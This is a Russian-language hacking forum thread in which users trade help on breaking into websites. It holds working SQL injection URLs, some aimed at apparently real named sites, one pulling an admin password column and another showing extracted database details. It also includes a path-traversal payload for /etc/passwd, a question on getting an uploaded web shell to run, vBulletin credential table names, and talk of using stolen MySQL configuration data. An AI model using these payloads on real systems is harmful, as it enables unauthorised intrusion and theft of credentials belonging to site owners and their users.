Ваши вопросы по уязвимостям.

Через ошибку в данной скули вывести не получится... Т.к. тут при неверном запросе просто показывает SQL запрос, который пошел в базу. А саму ошибку не показывает.

 

пацаны это инклюд?
Fatal error: require() [function.require]: Failed opening required 'articles/../../../../../../../../../etc/php.ini/text.htm' (include_path='.:/usr/local/share/pear') in /pub/home/teplotex/htdocs/fedorov/warlib/index.php on line 115

 

Да, попробуй так ../../../../../../../../../../../../../etc/passwd%00

 

,...

 

Взято с HackZone.RU - Больше про XSS

 

Не могу разобратся. Значит запрос к базе такой

$dbb=mysql_query("select * from zas where id='{$_GET['id']}'");
$dbb=mysql_fetch_array($dbb);

получаетса id это int, и при запросе
http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,2,3/*'
выводитса 2...
но если делаю запрос
http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,user(),3/*'
то выдает Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in Z:\home\test1.ru\www\index.php on line ...
как правильно сделать?

 

попробуй

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,unhex(hex(user())),3/*'
http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,/*!user()*/,3/*'


Загружаю шелл в профайл админа cms Phorum, оказывается записывает файл в бд, как сделать исполнение кода? (http://127.0.0.1/file.php?0,file=1,filename=shell.php)

 

помогло...

Возможно ли вскрыть такое?)
http://www.luman.lg.ua/content.php?type=about_0400'

 

http://www.luman.lg.ua/strelby.php?title=%CF%F3%EB%E8+%22%CB%FE%EC%E0%ED%22+FT-0%2C68&id=70+and+1=0+union+select+1,2,3,4,5,6,7,8,pass+from+adm_user

пробелы необходимо убрать

 

Подкиньте уязвимостей по phpbb 3.0.2...
Из тех что есть в этой темке большинство подразумевает наличие уязвимых модов либо права админа... У меня нет возможности даже зарегистрироваться(регистрация там только по подтверждению админом), а из модов, насколько я понял, только некие arcade и tosviolation.

 

Не думал, что когда-то буду сюда писать...но))

_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)

 

ВНЕЗАПНО!111

http://www.nordiz.ru/news.php?newsid=119+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--+

 

да ,
database version: 5.1.41-log
database user: hand_mysql@10.1.104.162
database name: hand_nordis

 

мда, скульмап по 1 символу в 1.5 минуты тащит, олоооо

 

какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно

 

Вот, полезный списочек http://itdefence.ru/dbitems/

Code:

[B]Table:[/B] user
[B]Columns:[/B]
userid
usergroupid
username
password
email

 

как можно определить жумлу к какому сайта относится кроме таблиц jos_session и jos_content и файла configuration.php (на самом деле только доступ к таблицам)?

 

Помогите, плз
Имею пхп-инъек..
Вытащил config.php - получил данные к mysql, но host:localhost

Вопрос: как можно узнать mysql.server???

спасибо​

 

попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..

 

пробовал, не выходит

А в /etc/passwd можно откопать имя пользователя???